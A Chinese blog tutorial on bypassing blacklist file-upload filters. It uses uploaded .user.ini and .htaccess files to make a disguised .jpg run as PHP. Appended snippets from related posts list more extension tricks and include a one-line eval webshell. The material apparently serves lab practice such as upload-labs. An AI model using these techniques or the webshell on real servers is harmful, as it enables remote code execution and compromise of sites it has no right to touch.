黑名单文件上传绕过

最新推荐文章于 2024-11-13 22:33:35 发布
原创 最新推荐文章于 2024-11-13 22:33:35 发布 · 1.6k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了如何利用.htaccess和.user.ini配置文件实现黑名单文件上传绕过,包括漏洞原理、复现步骤及使用条件,展示了如何通过特定配置使上传的图片文件作为PHP代码执行。

黑名单文件上传绕过

  • 我在西北,一山又一山。与你相隔,一关又一关。

漏洞概述:

  • .htaccess用于Apache
  • .user.ini用于php

漏洞复现:

  • .user.ini
    原理:
    .user.ini将所有php文件自动包含任意木马文件执行。
    使用条件:
    只要以cgi/FastCGI/fpm模式运行的php,并且上传目录下要有正常可执行的php文件,都可以成功包含

    上传1.user.ini

auto_prepend_file=1.jpg

然后上传1.jpg

GIF89a
<?php
phpinfo();
?>

访问正常php文件,即可成功包含
在这里插入图片描述

  • .htaccess

前提apache,需要开启

 Options FollowSymLinks
 AllowOverride All 
 LoadModule rewrite_module modules/mod_rewrite.so

然后上传1.htaccess

<FilesMatch "1.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

访问1.jpg即可执行php

**余生很长,请多指教。**

在这里插入图片描述

27-4 文件上传漏洞 - 黑名单绕过
weixin_43263566的博客
03-18 971
可以将php文件的后缀改成上述的其他可用后缀名如:php2、php3、....,但是这种方式有个前提需要配置靶场的服务器,才能让服务器将这种后缀名识别为php,所以我感觉这种绕过方式不是很实用,这里使用 .htaccess文件来绕过。尝试上传这个带有不合法后缀名的文件,如果可以正常上传,则说明目标系统的后台可能存在黑名单绕过或者未进行绕过处理;上传成功后我们就可以将我们要上传到靶场中的php文件改名为 4.png 之后我们就可以操作这个文件,我这里上传php一句话马的文件,后面使用蚁剑连接。
文件上传黑名单绕过
weixin_54105551的博客
09-07 1488
这一次过滤的更加彻底一些了,.htaccess格式的文件也做了过滤(最后一个,这里不好截图),但是也有一个缺点,没有统一后缀名,所以我们可以构造Php这种写法的后缀名来绕过黑名单过滤,没有特殊配置的情况下绕过方法对linux操作系统的服务器无法实现绕过,因为linux不区分大小写,只有Windows会忽略大小写,上传如下格式的文件至服务器中。这个时候我们上传的shell.jpg被当作php解析了,为了后面的操作,我们最好是先回到更目录,清除一下上传的文件。
文件上传黑名单绕过
2301_79299101的博客
11-08 1542
上传的文件后缀名在列表内禁止上传。6,. 利用 windows 环境的叠加特征绕过上传:在 windwos 中如果上传文件名 moonsec.php:.jpg 的时候,会在目录下生产空白的文件名 moonsec.php 再利用 php 和 windows 环境的叠加属性, 以下符号在正则匹配时相等 双引号" 等于 点号. 大于符号> 等于 问号?7, 在上传模块,有的代码会把黑名单的后缀名替换成空,例如a.php 会把php 替换成空,但是可以使用双写绕过例如 asaspp,pphphp,即可绕过上传。
文件上传绕过黑名单方法
weixin_53498616的博客
03-03 695
利用PHP 和 Windows环境的叠加特性,以下符号在正则匹配时的相等性: 双引号" = 点号. 大于符号> = 问号? 小于符号< = 星号* 先上传一个名为1.php:.jpg的文件,上传成功后会生成1.php的空文件,大小为0KB。 然后将文件名改为1.<或1.<<<或1.>>>或1.>><后再次上传,重写1.php文件内容,Webshell代码就会写入原来的1.php空文件中。 ...
黑名单绕过
qq_53365842的博客
04-20 973
在很多时候有限制文件上传的类型,而黑名单ban了很多相关的后缀,如果没有警用.htaccee那么就能触发getshell .htaccess可以把.jpg解析成php AddType application/x-httpd-php .jpg 先上传.htaccess文件,但是要修改后缀来绕过前端验证,在通过抓包修改回来 再上传jpg的文件,其实是将php一句话木马的文件改为jpg后缀 PHP: <?php @eval($_POST['404']);?> 用蚁剑连接 http
绕过黑名单验证
白菜执笔人的博客
03-05 3585
Web安全攻防 学习笔记 一、绕过黑名单验证(基本都用到 BurpSuite) 1.1、基于文件后缀名验证         对于文件上传模块来说,尽量避免上传可执行的脚本文件。为了防止上传脚本需要设置对应的验证 方式。最简单的就是设置文件后缀名验证。 验证方式的分类 (1)基于白名单验证:只针对白名单中有的后缀名,文件才能上传成功。 (2)基于黑名单...
第九节 文件上传-绕过黑名单验证(路径拼接绕过)-01
09-15
文件上传-绕过黑名单验证(路径拼接绕过) 在 Web 应用程序中,文件上传是非常常见的功能,但是在实现文件上传时,需要注意安全问题,例如黑名单验证。黑名单验证是指在文件上传时,对上传的文件进行检查,如果...
第十节 文件上传-绕过黑名单验证(双写绕过)-01
09-15
"文件上传绕过黑名单验证(双写绕过)" 文件上传绕过黑名单验证是 Web 应用安全中的一种常见攻击方式。黑名单验证是一种常用的安全措施,用于阻止恶意文件上传到服务器。但是,攻击者可以通过各种方法来绕过黑名单...
精选资源
第六节 文件上传-绕过黑名单验证(空格绕过)-01
09-15
文件上传-绕过黑名单验证(空格绕过文件上传绕过黑名单验证是指攻击者通过巧妙地构造文件名,绕过服务器端的黑名单验证,从而上传恶意文件。其中,空格绕过原理是其中一种常见的绕过方式。 一、空格绕过原理 ...
第八节 文件上传-绕过黑名单验证($DATA绕过)-01
09-15
文件上传-绕过黑名单验证($DATA绕过文件上传是Web应用程序中常见的功能,但是如果没有正确的验证机制,可能会导致安全漏洞。黑名单验证是一种常见的验证机制,但是如果攻击者能够绕过黑名单验证,那么可能会...
文件上传漏洞之黑名单
qq_68233961的博客
09-10 1502
文件上传漏洞之黑名单
【网络安全】文件上传黑白名单及数组绕过技巧
goldfish8848的博客
07-28 2529
将客户端数据以文件形式封装,通过网络协议发送到服务器端,在服务器解析数据,最终在服务端硬盘上作为真实的文件保存。
黑名单绕过学习
最新发布
qq_55515447的博客
11-13 1220
黑名单绕过的方法不止上面提到的几种,当然实际环境中也不会是仅一种检测方式,基本都是很多种方法嵌套使用,所以我们要先进行信息收集,确定好靶机的操作系统、服务器,根据实际情况选择绕过方法。如upload-labs的的pass-03// 初始化上传状态为 false,表示尚未上传成功// 初始化消息变量为 null,用于存储错误信息或成功信息// 检查是否提交了表单// 检查上传目录是否存在// 定义不允许上传的文件扩展名// 获取上传文件的名称并去除首尾空格。
01文件上传漏洞(黑名单检测篇)
jayq1的博客
03-15 1013
关于web安全文件上传漏洞知识分享
文件上传--3黑名单绕过
技术骨干小李的博客
07-29 1625
介绍一下文件上传漏洞中,黑名单绕过
上传验证绕过——服务端黑名单绕过
Williamanddog的博客
01-28 1178
htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。由于.htaccess还是没有过滤,可以重写文件解析规则绕过,上传一个 .htaccess,文件内容如下,意思。Upload-labs(Pass-03)根据源码可以看出,只是做了个简单的后缀名黑名单,识别上传文件的类型是。否为 '.asp','.aspx','.php','.jsp' 中的一个,若是其中的一个,则不允许上传。这一关的思路是它没有循环验证,也就是说这些首尾去空,删除末尾的点,去除字符串:$SDATA,转换。
33、文件上传 -- 绕过黑名单
Web安全工具库
01-09 854
一、大小写绕过 1、上传1.php文件 2、上传1.phP文件 3、用菜刀链接 二、利用空格绕过 上传1.php文件,通过burpsuite抓包,在文件名后面加空格 三、利用.号绕过 上传1.php文件,通过burpsuite抓包,在文件名后面加个点号 四、利用特殊字符绕过 上传1.php文件,通过burpsuite抓包,在文件名后面加上::$DATA 禁止非法,后果自负 欢迎关...
【漏洞靶场】文件上传后端检测黑名单大小写绕过--upload-labs
m0_46344990的博客
04-26 1440
一、漏洞描述 在uploads-labs第六关中,服务器采用了黑名单的方式过滤上传文件的后缀,黑名单中包含了所有违法的后缀。包括可以让所有文件都当php脚本执行的.htaccess配置文件。但是在过滤函数中缺漏了将大写转化为小写的函数,可通过将文件后缀写为大写即可绕过。此方法靶场在liunx下不可用。因为liunx大小写敏感,默认windows大小写不敏感。 二、漏洞发现 在upload-labs第六关中就是采用了黑名单验证文件后缀的方式做文件上传的限制,先在本地写php脚本若上传成功,且知道上传后文
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值